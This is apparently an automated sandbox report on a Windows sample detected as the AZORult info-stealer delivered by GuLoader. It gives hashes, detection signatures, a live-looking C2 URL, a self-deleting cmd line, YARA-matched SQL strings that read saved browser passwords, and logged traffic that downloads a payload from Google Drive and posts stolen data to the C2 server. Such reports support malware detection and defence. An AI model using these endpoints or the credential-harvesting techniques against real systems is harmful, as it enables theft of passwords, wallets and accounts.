Windows Analysis Report 1COK25f1vT.exe

Overview

General Information

Sample Name: 1COK25f1vT.exe
Analysis ID: 542372
MD5: 5918b91ac2931af0267e4af06f3fd2e2
SHA1: 1ce7cccf52a0a569d013c0a91efb4f808c3c6194
SHA256: 41acb7b14d4167374da9039e1324caac71b397bf246abb50cb9ae1ca197b3cc1
Tags: AZORult, exe

Detection

AZORult GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Potential malicious icon found
Yara detected Azorult
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Detected AZORult Info Stealer
Yara detected Azorult Info Stealer
Detected unpacking (changes PE section rights)
GuLoader behavior detected
Yara detected GuLoader
Hides threads from debuggers
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to steal Crypto Currency Wallets
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
Tries to harvest and steal Bitcoin Wallet information
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to steal Instant Messenger accounts or passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Binary contains a suspicious time stamp
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • 1COK25f1vT.exe (PID: 7040 cmdline: "C:\Users\user\Desktop\1COK25f1vT.exe" MD5: 5918B91AC2931AF0267E4AF06F3FD2E2)
    • 1COK25f1vT.exe (PID: 2132 cmdline: "C:\Users\user\Desktop\1COK25f1vT.exe" MD5: 5918B91AC2931AF0267E4AF06F3FD2E2)
      • cmd.exe (PID: 1360 cmdline: C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "1COK25f1vT.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 1676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • timeout.exe (PID: 6828 cmdline: C:\Windows\system32\timeout.exe 3 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
  • cleanup

Malware Configuration

Threatname: Azorult

{"C2 url": "http://185.29.11.112/rothchildnew/Panel/index.php"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.385834969.000000001FC24000.00000040.00020000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
0000000C.00000002.510992835.0000000000401000.00000020.00020000.sdmp | JoeSecurity_Azorult | Yara detected Azorult Info Stealer | Joe Security |
0000000C.00000002.510992835.0000000000401000.00000020.00020000.sdmp | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security |
0000000C.00000002.515598674.000000002030C000.00000004.00000001.sdmp | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security |
00000000.00000002.383092369.0000000002A90000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
12.2.1COK25f1vT.exe.400000.0.unpack | JoeSecurity_Azorult | Yara detected Azorult Info Stealer | Joe Security |
12.2.1COK25f1vT.exe.400000.0.unpack | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security |
12.2.1COK25f1vT.exe.400000.0.unpack | Azorult_1 | Azorult Payload | kevoreilly |
  • 0x17353:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ...
  • 0x1207c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
12.2.1COK25f1vT.exe.2004391e.5.raw.unpack | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security |
12.2.1COK25f1vT.exe.2004391e.5.raw.unpack | OlympicDestroyer_1 | OlympicDestroyer Payload | kevoreilly |
  • 0x2988e9:$string1: SELECT origin_url, username_value, password_value FROM logins
  • 0x2994d6:$string1: SELECT origin_url, username_value, password_value FROM logins
  • 0x109a34:$string2: API call with %s database connection pointer
  • 0x10a668:$string3: os_win.c:%d: (%lu) %s(%s) - %s

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 12.2.1COK25f1vT.exe.400000.0.unpack, Malware Configuration Extractor: Azorult {"C2 url": "http://185.29.11.112/rothchildnew/Panel/index.php"}
Multi AV Scanner detection for submitted file
Source: 1COK25f1vT.exe, Virustotal: Detection: 40%
Source: 1COK25f1vT.exe, ReversingLabs: Detection: 71%
Source: 0.2.1COK25f1vT.exe.1fb10000.1.unpack, Avira: Label: TR/Dropper.Gen
Source: C:\Users\user\Desktop\1COK25f1vT.exe, Code function: 12_2_0040A610 CryptUnprotectData,LocalFree,12_2_0040A610
Source: 1COK25f1vT.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown, HTTPS traffic detected: 172.217.168.46:443 -> 192.168.2.3:49786 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.217.168.1:443 -> 192.168.2.3:49787 version: TLS 1.2
                  Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491634229.0000000020368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.479960511.000000001F998000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491671682.0000000020370000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491651913.000000002036C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.480478688.000000001F99C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491685778.0000000020374000.00000004.00000001.sdmp, api-ms-win-crt-math-l1-1-0.dll.12.dr
                  Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: 1COK25f1vT.exe, 0000000C.00000003.487823577.000000001F1F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492773065.000000001F838000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487925295.000000001F1CC000.00000004.00000001.sdmp, softokn3.dll.12.dr
                  Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491172974.00000000202F8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491203658.00000000202FC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491225253.0000000020300000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491277123.000000002030C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491294897.0000000020314000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491349501.0000000020324000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491260411.0000000020308000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.473845022.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491306740.0000000020318000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491334003.0000000020320000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491319974.000000002031C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491243929.0000000020304000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.12.dr
                  Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491172974.00000000202F8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491203658.00000000202FC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491225253.0000000020300000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491277123.000000002030C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491294897.0000000020314000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491260411.0000000020308000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.471221878.000000001F998000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491306740.0000000020318000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.471958408.000000001F99C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491243929.0000000020304000.00000004.00000001.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.12.dr
                  Source: Binary string: vcruntime140.i386.pdb source: 1COK25f1vT.exe, 0000000C.00000003.490976694.000000001F304000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.489151743.000000001F290000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.493685455.000000001F978000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490948392.000000001F1CC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, vcruntime140.dll.12.dr
                  Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491708487.000000002037C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491634229.0000000020368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491671682.0000000020370000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491651913.000000002036C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491685778.0000000020374000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.480866812.000000001F998000.00000004.00000001.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.12.dr
                  Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491836442.00000000203BC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.483738780.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491806581.00000000203B4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491826874.00000000203B8000.00000004.00000001.sdmp, api-ms-win-crt-utility-l1-1-0.dll.12.dr
                  Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.475000686.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491363124.0000000020330000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491387107.0000000020334000.00000004.00000001.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.12.dr
                  Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491501790.0000000020340000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491475649.000000002033C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491523003.0000000020344000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491545056.0000000020348000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491363124.0000000020330000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491387107.0000000020334000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491439552.0000000020338000.00000004.00000001.sdmp, api-ms-win-core-timezone-l1-1-0.dll.12.dr
                  Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: 1COK25f1vT.exe, 0000000C.00000003.487119055.000000001F238000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487230327.000000001F364000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485890632.000000001F290000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, nssdbm3.dll.12.dr
                  Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.475000686.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.475402246.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491363124.0000000020330000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491387107.0000000020334000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491439552.0000000020338000.00000004.00000001.sdmp, api-ms-win-core-string-l1-1-0.dll.12.dr
                  Source: Binary string: msvcp140.i386.pdbGCTL source: 1COK25f1vT.exe, 0000000C.00000003.485203963.000000001F1CC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492268054.000000001F688000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485153671.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, msvcp140.dll.12.dr
                  Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491172974.00000000202F8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.466563733.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, api-ms-win-core-file-l2-1-0.dll.12.dr
                  Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491775740.0000000020398000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491748363.0000000020388000.00000004.00000001.sdmp, api-ms-win-crt-process-l1-1-0.dll.12.dr
                  Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491172974.00000000202F8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491203658.00000000202FC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491225253.0000000020300000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.469680104.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491260411.0000000020308000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491243929.0000000020304000.00000004.00000001.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.12.dr
                  Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491172974.00000000202F8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491203658.00000000202FC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491225253.0000000020300000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491243929.0000000020304000.00000004.00000001.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.12.dr
                  Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491634229.0000000020368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491651913.000000002036C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.479481362.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.479096628.000000001F990000.00000004.00000001.sdmp, api-ms-win-crt-heap-l1-1-0.dll.12.dr
                  Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.482506212.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.482913611.000000001F99C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491806581.00000000203B4000.00000004.00000001.sdmp, api-ms-win-crt-string-l1-1-0.dll.12.dr
                  Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_0041006C FindFirstFileW,FindFirstFileW,12_2_0041006C
                  Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_00414808 FindFirstFileW,12_2_00414808
                  Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_00413030 FindFirstFileW,FindNextFileW,FindClose,12_2_00413030
                  Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_004099C0 FreeLibrary,FindFirstFileW,DeleteFileW,FindNextFileW,SetCurrentDirectoryW,RemoveDirectoryW,12_2_004099C0
                  Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_0040A9E4 FindFirstFileW,FindNextFileW,12_2_0040A9E4
                  Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_0040D988 FindFirstFileW,FindFirstFileW,12_2_0040D988
                  Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_004119AC FindFirstFileW,FindNextFileW,FindClose,12_2_004119AC
                  Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_00414A90 FindFirstFileW,FindFirstFileW,12_2_00414A90
                  Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_0040FB40 FindFirstFileW,12_2_0040FB40
                  Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_00412D6C FindFirstFileW,FindNextFileW,FindClose,12_2_00412D6C
                  Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_00414DE8 FindFirstFileW,FindNextFileW,12_2_00414DE8
                  Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_0041160C FindFirstFileW,FindNextFileW,FindClose,12_2_0041160C
                  Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_00409EF0 FindFirstFileW,GetFileAttributesW,12_2_00409EF0
                  Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,12_2_00413F58
                  Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_0040F7A8 FindFirstFileW,FindNextFileW,12_2_0040F7A8
                  Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_00410064 FindFirstFileW,FindFirstFileW,12_2_00410064
                  Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_00410068 FindFirstFileW,FindFirstFileW,12_2_00410068
                  Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_0040A9E3 FindFirstFileW,FindNextFileW,12_2_0040A9E3
                  Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_004119A8 FindFirstFileW,FindNextFileW,FindClose,12_2_004119A8
                  Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_0040DB00 FindFirstFileW,12_2_0040DB00
                  Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_0040DB30 FindFirstFileW,12_2_0040DB30
                  Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_00412D40 FindFirstFileW,FindNextFileW,FindClose,12_2_00412D40
                  Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_00412D48 FindFirstFileW,FindNextFileW,FindClose,12_2_00412D48
                  Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_00412D54 FindFirstFileW,FindNextFileW,FindClose,12_2_00412D54
                  Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_00409EE8 FindFirstFileW,GetFileAttributesW,12_2_00409EE8
                  Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_0040F798 FindFirstFileW,FindNextFileW,12_2_0040F798
                  Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_0040F7A0 FindFirstFileW,FindNextFileW,12_2_0040F7A0
                  Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_1_004148A0 __vbaStrCopy,__vbaStrCopy,__vbaStrCopy,__vbaRedim,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,FindFirstFileW,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaFreeStr,__vbaFreeStr,__vbaFreeStr,__vbaAryDestruct,12_1_004148A0
                  Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_1_00414DD0 __vbaChkstk,__vbaOnError,FindFirstFileW,12_1_00414DD0

                  Networking:

                  Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
                  Source: Traffic Snort IDS: 2029465 ET TROJAN Win32/AZORult V3.2 Client Checkin M15 192.168.2.3:49789 -> 185.29.11.112:80
                  Source: Traffic Snort IDS: 2029141 ET TROJAN AZORult v3.2 Server Response M3 185.29.11.112:80 -> 192.168.2.3:49789
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractor URLs: http://185.29.11.112/rothchildnew/Panel/index.php
                  Source: Joe Sandbox View ASN Name: DATACLUB-NL DATACLUB-NL
                  Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: global traffic HTTP traffic detected:
                    GET /uc?export=download&id=17RU0VECH2DoNYHaGWGuE-Ywt9AUTzsM- HTTP/1.1
                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                    Host: drive.google.com
                    Cache-Control: no-cache
                  Source: global traffic HTTP traffic detected:
                    GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/7bnkiq90sqb2f9a5rfbavvv8a7avoa21/1639944750000/11699732749327025486/*/17RU0VECH2DoNYHaGWGuE-Ywt9AUTzsM-?e=download HTTP/1.1
                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                    Cache-Control: no-cache
                    Host: doc-0o-b4-docs.googleusercontent.com
                    Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected:
                    POST /rothchildnew/Panel/index.php HTTP/1.1
                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                    Host: 185.29.11.112
                    Content-Length: 107
                    Cache-Control: no-cache
